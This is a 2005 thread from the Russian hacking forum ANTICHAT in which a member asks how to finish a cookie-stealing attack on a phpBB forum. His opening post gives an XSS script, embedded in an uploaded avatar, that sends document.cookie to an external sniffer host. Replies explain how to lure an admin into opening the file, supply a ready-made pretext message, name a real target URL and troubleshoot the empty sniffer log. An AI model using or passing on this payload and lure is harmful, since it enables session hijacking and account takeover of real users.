HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Все тот же phpBB
  #1  
Старый 08.12.2005, 16:11
Dimazzz
Участник форума
Регистрация: 23.11.2005
Сообщений: 179
С нами: 10770849

Репутация: 23
По умолчанию Все тот же phpBB

Прочитал статью как залить снифер через аватар, что то никан не могу освоить этот трюк.

Скажите что нужно делать после того как я :

<script>img = nеw Imаge(); img.srс = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>

сохранил это скрипт в аватарку и залил его на форум.
Далее я посмотрел его полный путь , скажите что нужно сделать дальше а то что то не разберусь.
 
Ответить с цитированием

  #2  
Старый 08.12.2005, 16:16
Dimazzz
Участник форума
Регистрация: 23.11.2005
Сообщений: 179
С нами: 10770849

Репутация: 23
По умолчанию

И если можно объясните на примере видео про phpNuke.
 
Ответить с цитированием

  #3  
Старый 08.12.2005, 16:24
D1mOn
Постоянный
Регистрация: 02.10.2005
Сообщений: 490
С нами: 10845026

Репутация: 212
По умолчанию

Да админу ссылку на аватару и иди смотреть лог.
 
Ответить с цитированием

  #4  
Старый 08.12.2005, 16:26
*Van*
Постоянный
Регистрация: 14.08.2005
Сообщений: 378
С нами: 10915586

Репутация: 54
По умолчанию

Нужно чтобы юзер(админ если хочешь) открыл этот файл в новом окне, тогда куки придут на сниффер.
 
Ответить с цитированием

  #5  
Старый 08.12.2005, 16:29
Dimazzz
Участник форума
Регистрация: 23.11.2005
Сообщений: 179
С нами: 10770849

Репутация: 23
По умолчанию

значит мне нужно комунить в личку написать письмо
такого вида:

http://himclan.com/forum/uploads/av-246.jpg
 
Ответить с цитированием

  #6  
Старый 08.12.2005, 16:33
D1mOn
Постоянный
Регистрация: 02.10.2005
Сообщений: 490
С нами: 10845026

Репутация: 212
По умолчанию

Напиши :"Почему аватара не отбражается http://himclan.com/forum/uploads/av-246.jpg =))"
И надейся и жди что юзер(админ) пойдет =))
 
Ответить с цитированием

  #7  
Старый 08.12.2005, 16:46
Azazel
Заведующий всем
Регистрация: 17.04.2005
Сообщений: 1,062
С нами: 11087066

Репутация: 561


По умолчанию

Я делал так: http://forum.antichat.ru/showthread.php?t=9910 Именно на phpBB+Nuke. Работало.
__________________
Full DNS report
 
Ответить с цитированием

  #8  
Старый 08.12.2005, 18:50
Dimazzz
Участник форума
Регистрация: 23.11.2005
Сообщений: 179
С нами: 10770849

Репутация: 23
По умолчанию

Цитата:
Сообщение от D1mOn  
Напиши :"Почему аватара не отбражается http://himclan.com/forum/uploads/av-246.jpg =))"
И надейся и жди что юзер(админ) пойдет =))

Отослал но почему то на лог снифера ничего не приходит ((
 
Ответить с цитированием

  #9  
Старый 08.12.2005, 20:35
*Van*
Постоянный
Регистрация: 14.08.2005
Сообщений: 378
С нами: 10915586

Репутация: 54
По умолчанию

Может он не открыл, может ты просмотрел пока пришло(если использовал ачатовский сниффер) (или не подписался). Может админ сидит без картинок или может он использует не осла.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
PhpBB 2.0.15 Database Authentication Details Exploit VARVAR Уязвимости CMS / форумов 11 01.02.2007 12:21
Вопросы по форуму phpbb 2.0.13 silveran Уязвимости CMS / форумов 24 23.12.2005 17:18
phpBB < 2.0.15, BBCODE URL в phpBB karapuz Уязвимости CMS / форумов 21 17.06.2005 06:11
Очередные дыры: phpBB 2.0.14 rsha1988 Уязвимости CMS / форумов 8 08.05.2005 18:48
Дыра в phpbb привела к массовым взломам сайтов ФРАЙ Мировые новости. Обсуждения. 7 19.12.2004 08:10



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.